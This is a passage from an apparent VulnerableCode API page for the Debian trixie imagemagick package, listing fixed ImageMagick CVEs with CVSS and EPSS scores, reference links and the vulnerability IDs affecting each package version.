Django REST framework

Lookup for vulnerable packages by Package URL.

Purl pkg:deb/debian/imagemagick@0?distro=trixie

Type deb

Namespace debian

Name imagemagick

Version 0

Qualifiers

distro	trixie

Subpath

Is_vulnerable false

Next_non_vulnerable_version 4:5.5.7-1

Latest_non_vulnerable_version 8:7.1.2.19+dfsg1-1

Affected_by_vulnerabilities

Fixing_vulnerabilities

url VCID-177y-cbh1-myay

vulnerability_id VCID-177y-cbh1-myay

summary ImageMagick: an integer overflow vulnerability in the function TIFFSeekCustomStream in coders/tiff.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13136.json

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13136.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-13136

reference_id

reference_type

scores

value	0.003
scoring_system	epss
scoring_elements	0.53388
published_at	2026-04-26T12:55:00Z

value	0.003
scoring_system	epss
scoring_elements	0.53419
published_at	2026-04-16T12:55:00Z

value	0.003
scoring_system	epss
scoring_elements	0.53424
published_at	2026-04-18T12:55:00Z

value	0.003
scoring_system	epss
scoring_elements	0.53404
published_at	2026-04-21T12:55:00Z

value	0.003
scoring_system	epss
scoring_elements	0.53376
published_at	2026-04-24T12:55:00Z

value	0.00306
scoring_system	epss
scoring_elements	0.53848
published_at	2026-04-08T12:55:00Z

value	0.00306
scoring_system	epss
scoring_elements	0.53894
published_at	2026-04-11T12:55:00Z

value	0.00306
scoring_system	epss
scoring_elements	0.53877
published_at	2026-04-12T12:55:00Z

value	0.00306
scoring_system	epss
scoring_elements	0.53861
published_at	2026-04-13T12:55:00Z

value	0.00306
scoring_system	epss
scoring_elements	0.53776
published_at	2026-04-01T12:55:00Z

value	0.00306
scoring_system	epss
scoring_elements	0.53846
published_at	2026-04-09T12:55:00Z

value	0.00306
scoring_system	epss
scoring_elements	0.53796
published_at	2026-04-07T12:55:00Z

value	0.00306
scoring_system	epss
scoring_elements	0.53822
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-13136

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1726124
reference_id	1726124
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1726124

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-13136

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-177y-cbh1-myay

url VCID-267c-s4sq-9bfw

vulnerability_id VCID-267c-s4sq-9bfw

summary ImageMagick: Use after free in ReadICCProfile function in coders/jpeg.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-17541.json

reference_id

reference_type

scores

value	7.8
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-17541.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-17541

reference_id

reference_type

scores

value	0.00201
scoring_system	epss
scoring_elements	0.42148
published_at	2026-04-01T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42092
published_at	2026-04-26T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42218
published_at	2026-04-18T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42149
published_at	2026-04-21T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42096
published_at	2026-04-24T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42206
published_at	2026-04-02T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42233
published_at	2026-04-09T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42175
published_at	2026-04-07T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42226
published_at	2026-04-08T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42257
published_at	2026-04-11T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.4222
published_at	2026-04-12T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42192
published_at	2026-04-13T12:55:00Z

value	0.00201
scoring_system	epss
scoring_elements	0.42242
published_at	2026-04-16T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-17541

reference_url	https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15827
reference_id
reference_type
scores
url	https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15827

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://github.com/ImageMagick/ImageMagick/commit/39f226a9c137f547e12afde972eeba7551124493
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/commit/39f226a9c137f547e12afde972eeba7551124493

reference_url	https://github.com/ImageMagick/ImageMagick/compare/7.0.8-54...7.0.8-55
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/compare/7.0.8-54...7.0.8-55

reference_url	https://github.com/ImageMagick/ImageMagick/issues/1641
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/issues/1641

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1767087
reference_id	1767087
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1767087

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick::::::::
reference_id	cpe:2.3:a:imagemagick:imagemagick::::::::
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick::::::::

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2019-17541

reference_id

CVE-2019-17541

reference_type

scores

value	6.8
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:P/I:P/A:P

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://nvd.nist.gov/vuln/detail/CVE-2019-17541

reference_url	https://access.redhat.com/errata/RHSA-2020:1180
reference_id	RHSA-2020:1180
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2020:1180

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-17541

risk_score 4.0

exploitability 0.5

weighted_severity 7.9

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-267c-s4sq-9bfw

url VCID-2yv5-qdeg-9bag

vulnerability_id VCID-2yv5-qdeg-9bag

summary ImageMagick: Magick.NET: ImageMagick: Denial of Service via heap write overflow in JXL encoder

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40183.json

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40183.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-40183

reference_id

reference_type

scores

value	0.00012
scoring_system	epss
scoring_elements	0.01573
published_at	2026-04-16T12:55:00Z

value	0.00012
scoring_system	epss
scoring_elements	0.01634
published_at	2026-04-18T12:55:00Z

value	4e-05
scoring_system	epss
scoring_elements	0.00203
published_at	2026-04-26T12:55:00Z

value	4e-05
scoring_system	epss
scoring_elements	0.00204
published_at	2026-04-24T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-40183

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:07:54Z/

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/1c7767fc5f822c6edc104c1220d523e96fa20b5a

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/commit/1c7767fc5f822c6edc104c1220d523e96fa20b5a

reference_url

https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:07:54Z/

url

https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-jvgr-9ph5-m8v4

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:07:54Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-jvgr-9ph5-m8v4

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-40183

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-40183

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2458054
reference_id	2458054
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2458054

reference_url

https://github.com/advisories/GHSA-jvgr-9ph5-m8v4

reference_id

GHSA-jvgr-9ph5-m8v4

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-jvgr-9ph5-m8v4

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

